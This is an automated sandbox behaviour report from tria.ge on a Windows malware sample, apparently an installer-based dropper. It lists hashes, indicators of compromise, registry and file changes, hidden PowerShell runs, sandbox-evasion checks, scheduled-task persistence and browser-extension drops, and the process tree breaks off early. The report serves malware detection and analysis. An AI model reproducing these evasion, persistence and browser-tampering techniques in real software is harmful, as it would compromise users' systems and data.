Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
162s -
max time network
188s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
30/05/2024, 23:18
Static task
static1
Behavioral task
behavioral1
Sample
9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe
Resource
win7-20240508-en
General
-
Target
9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe
-
Size
7.3MB
-
MD5
f821be97eae32226308cc4cb0b7892a3
-
SHA1
96527037633e9b525b84da8772ec213783bf6041
-
SHA256
9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34
-
SHA512
007cc893e3d2f92b7f8e8c0afc4d7360b943b03ff6f6f964e7f1330ed2341229402c507f0e1485973e310af065ace3df85287b89f3b8d9aed7ee6fe6c10661cd
-
SSDEEP
196608:91O639u0W4n6CvwtKRXhgYHVHmvKxDMSCitowBfq09B4gU7f+8+:3O639NWo6w8U/1Hmv83to0q0zU7WF
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 31 2384 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 4664 powershell.exe 4836 powershell.exe 296 powershell.EXE 4552 powershell.exe 5020 powershell.exe 4380 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\International\Geo\Nation ZAYmpMn.exe -
Executes dropped EXE 4 IoCs
pid Process 3904 Install.exe 3324 Install.exe 4348 Install.exe 3656 ZAYmpMn.exe -
Loads dropped DLL 1 IoCs
pid Process 2384 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json ZAYmpMn.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ZAYmpMn.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Drops file in System32 directory 35 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ZAYmpMn.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZAYmpMn.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 ZAYmpMn.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 ZAYmpMn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZAYmpMn.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\FtTPlVLhSaUn\wGxjapr.dll ZAYmpMn.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZAYmpMn.exe File created C:\Program Files (x86)\mpUBPkkqU\JHlrZfz.xml ZAYmpMn.exe File created C:\Program Files (x86)\OOuPExCnaYTU2\aBRqtCzVolKNJ.dll ZAYmpMn.exe File created C:\Program Files (x86)\tQtOyvtwIjTyC\tMUNOHj.dll ZAYmpMn.exe File created C:\Program Files (x86)\tQtOyvtwIjTyC\lfhfaOk.xml ZAYmpMn.exe File created C:\Program Files (x86)\mpUBPkkqU\BqCVlN.dll ZAYmpMn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZAYmpMn.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZAYmpMn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi ZAYmpMn.exe File created C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR\MBqjdqD.dll ZAYmpMn.exe File created C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR\vXiDMMO.xml ZAYmpMn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ZAYmpMn.exe File created C:\Program Files (x86)\OOuPExCnaYTU2\TQriiba.xml ZAYmpMn.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bLzeoVMxrLqUlFeJJd.job schtasks.exe File created C:\Windows\Tasks\gcaOKtldTodyQokzi.job schtasks.exe File created C:\Windows\Tasks\WDtolTrtWazUMxY.job schtasks.exe File created C:\Windows\Tasks\ffSBZYZjRJDDYrjLt.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4560 4348 WerFault.exe 107 4892 3324 WerFault.exe 75 3768 3656 WerFault.exe 196 -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2924 schtasks.exe 632 schtasks.exe 904 schtasks.exe 2688 schtasks.exe 5076 schtasks.exe 3980 schtasks.exe 2600 schtasks.exe 1496 schtasks.exe 1532 schtasks.exe 4652 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ZAYmpMn.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache ZAYmpMn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fc7460-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix ZAYmpMn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ZAYmpMn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ZAYmpMn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 58 IoCs
pid Process 4380 powershell.exe 4380 powershell.exe 4380 powershell.exe 4664 powershell.exe 4664 powershell.exe 4664 powershell.exe 4836 powershell.exe 4836 powershell.exe 4836 powershell.exe 4592 powershell.exe 4592 powershell.exe 4592 powershell.exe 3532 powershell.exe 3532 powershell.exe 3532 powershell.exe 296 powershell.EXE 296 powershell.EXE 296 powershell.EXE 4552 powershell.exe 4552 powershell.exe 4552 powershell.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe 3656 ZAYmpMn.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4380 powershell.exe Token: SeDebugPrivilege 4664 powershell.exe Token: SeIncreaseQuotaPrivilege 4324 WMIC.exe Token: SeSecurityPrivilege 4324 WMIC.exe Token: SeTakeOwnershipPrivilege 4324 WMIC.exe Token: SeLoadDriverPrivilege 4324 WMIC.exe Token: SeSystemProfilePrivilege 4324 WMIC.exe Token: SeSystemtimePrivilege 4324 WMIC.exe Token: SeProfSingleProcessPrivilege 4324 WMIC.exe Token: SeIncBasePriorityPrivilege 4324 WMIC.exe Token: SeCreatePagefilePrivilege 4324 WMIC.exe Token: SeBackupPrivilege 4324 WMIC.exe Token: SeRestorePrivilege 4324 WMIC.exe Token: SeShutdownPrivilege 4324 WMIC.exe Token: SeDebugPrivilege 4324 WMIC.exe Token: SeSystemEnvironmentPrivilege 4324 WMIC.exe Token: SeRemoteShutdownPrivilege 4324 WMIC.exe Token: SeUndockPrivilege 4324 WMIC.exe Token: SeManageVolumePrivilege 4324 WMIC.exe Token: 33 4324 WMIC.exe Token: 34 4324 WMIC.exe Token: 35 4324 WMIC.exe Token: 36 4324 WMIC.exe Token: SeIncreaseQuotaPrivilege 4324 WMIC.exe Token: SeSecurityPrivilege 4324 WMIC.exe Token: SeTakeOwnershipPrivilege 4324 WMIC.exe Token: SeLoadDriverPrivilege 4324 WMIC.exe Token: SeSystemProfilePrivilege 4324 WMIC.exe Token: SeSystemtimePrivilege 4324 WMIC.exe Token: SeProfSingleProcessPrivilege 4324 WMIC.exe Token: SeIncBasePriorityPrivilege 4324 WMIC.exe Token: SeCreatePagefilePrivilege 4324 WMIC.exe Token: SeBackupPrivilege 4324 WMIC.exe Token: SeRestorePrivilege 4324 WMIC.exe Token: SeShutdownPrivilege 4324 WMIC.exe Token: SeDebugPrivilege 4324 WMIC.exe Token: SeSystemEnvironmentPrivilege 4324 WMIC.exe Token: SeRemoteShutdownPrivilege 4324 WMIC.exe Token: SeUndockPrivilege 4324 WMIC.exe Token: SeManageVolumePrivilege 4324 WMIC.exe Token: 33 4324 WMIC.exe Token: 34 4324 WMIC.exe Token: 35 4324 WMIC.exe Token: 36 4324 WMIC.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 4592 powershell.exe Token: SeDebugPrivilege 3532 powershell.exe Token: SeDebugPrivilege 296 powershell.EXE Token: SeDebugPrivilege 4552 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4848 WMIC.exe Token: SeIncreaseQuotaPrivilege 4848 WMIC.exe Token: SeSecurityPrivilege 4848 WMIC.exe Token: SeTakeOwnershipPrivilege 4848 WMIC.exe Token: SeLoadDriverPrivilege 4848 WMIC.exe Token: SeSystemtimePrivilege 4848 WMIC.exe Token: SeBackupPrivilege 4848 WMIC.exe Token: SeRestorePrivilege 4848 WMIC.exe Token: SeShutdownPrivilege 4848 WMIC.exe Token: SeSystemEnvironmentPrivilege 4848 WMIC.exe Token: SeUndockPrivilege 4848 WMIC.exe Token: SeManageVolumePrivilege 4848 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 4848 WMIC.exe Token: SeIncreaseQuotaPrivilege 4848 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1308 wrote to memory of 3904 1308 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 74 PID 1308 wrote to memory of 3904 1308 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 74 PID 1308 wrote to memory of 3904 1308 9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe 74 PID 3904 wrote to memory of 3324 3904 Install.exe 75 PID 3904 wrote to memory of 3324 3904 Install.exe 75 PID 3904 wrote to memory of 3324 3904 Install.exe 75 PID 3324 wrote to memory of 2648 3324 Install.exe 76 PID 3324 wrote to memory of 2648 3324 Install.exe 76 PID 3324 wrote to memory of 2648 3324 Install.exe 76 PID 2648 wrote to memory of 2084 2648 cmd.exe 78 PID 2648 wrote to memory of 2084 2648 cmd.exe 78 PID 2648 wrote to memory of 2084 2648 cmd.exe 78 PID 2084 wrote to memory of 4876 2084 forfiles.exe 79 PID 2084 wrote to memory of 4876 2084 forfiles.exe 79 PID 2084 wrote to memory of 4876 2084 forfiles.exe 79 PID 4876 wrote to memory of 3480 4876 cmd.exe 80 PID 4876 wrote to memory of 3480 4876 cmd.exe 80 PID 4876 wrote to memory of 3480 4876 cmd.exe 80 PID 2648 wrote to memory of 3600 2648 cmd.exe 81 PID 2648 wrote to memory of 3600 2648 cmd.exe 81 PID 2648 wrote to memory of 3600 2648 cmd.exe 81 PID 3600 wrote to memory of 4928 3600 forfiles.exe 82 PID 3600 wrote to memory of 4928 3600 forfiles.exe 82 PID 3600 wrote to memory of 4928 3600 forfiles.exe 82 PID 4928 wrote to memory of 4564 4928 cmd.exe 83 PID 4928 wrote to memory of 4564 4928 cmd.exe 83 PID 4928 wrote to memory of 4564 4928 cmd.exe 83 PID 2648 wrote to memory of 4408 2648 cmd.exe 84 PID 2648 wrote to memory of 4408 2648 cmd.exe 84 PID 2648 wrote to memory of 4408 2648 cmd.exe 84 PID 4408 wrote to memory of 4820 4408 forfiles.exe 85 PID 4408 wrote to memory of 4820 4408 forfiles.exe 85 PID 4408 wrote to memory of 4820 4408 forfiles.exe 85 PID 4820 wrote to memory of 4660 4820 cmd.exe 86 PID 4820 wrote to memory of 4660 4820 cmd.exe 86 PID 4820 wrote to memory of 4660 4820 cmd.exe 86 PID 2648 wrote to memory of 2412 2648 cmd.exe 87 PID 2648 wrote to memory of 2412 2648 cmd.exe 87 PID 2648 wrote to memory of 2412 2648 cmd.exe 87 PID 2412 wrote to memory of 2628 2412 forfiles.exe 88 PID 2412 wrote to memory of 2628 2412 forfiles.exe 88 PID 2412 wrote to memory of 2628 2412 forfiles.exe 88 PID 2628 wrote to memory of 4484 2628 cmd.exe 89 PID 2628 wrote to memory of 4484 2628 cmd.exe 89 PID 2628 wrote to memory of 4484 2628 cmd.exe 89 PID 2648 wrote to memory of 4440 2648 cmd.exe 90 PID 2648 wrote to memory of 4440 2648 cmd.exe 90 PID 2648 wrote to memory of 4440 2648 cmd.exe 90 PID 4440 wrote to memory of 4272 4440 forfiles.exe 91 PID 4440 wrote to memory of 4272 4440 forfiles.exe 91 PID 4440 wrote to memory of 4272 4440 forfiles.exe 91 PID 4272 wrote to memory of 4380 4272 cmd.exe 92 PID 4272 wrote to memory of 4380 4272 cmd.exe 92 PID 4272 wrote to memory of 4380 4272 cmd.exe 92 PID 4380 wrote to memory of 1892 4380 powershell.exe 93 PID 4380 wrote to memory of 1892 4380 powershell.exe 93 PID 4380 wrote to memory of 1892 4380 powershell.exe 93 PID 3324 wrote to memory of 508 3324 Install.exe 95 PID 3324 wrote to memory of 508 3324 Install.exe 95 PID 3324 wrote to memory of 508 3324 Install.exe 95 PID 508 wrote to memory of 4560 508 forfiles.exe 97 PID 508 wrote to memory of 4560 508 forfiles.exe 97 PID 508 wrote to memory of 4560 508 forfiles.exe 97 PID 4560 wrote to memory of 4664 4560 cmd.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe"C:\Users\Admin\AppData\Local\Temp\9c073f373478de7ebfb0a1cf8021095ecb24e07e5e5870ae0ea6c03f71d4ef34.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\7zS70EA.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Users\Admin\AppData\Local\Temp\7zS72EE.tmp\Install.exe.\Install.exe /hOBJRdidme "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3324 -
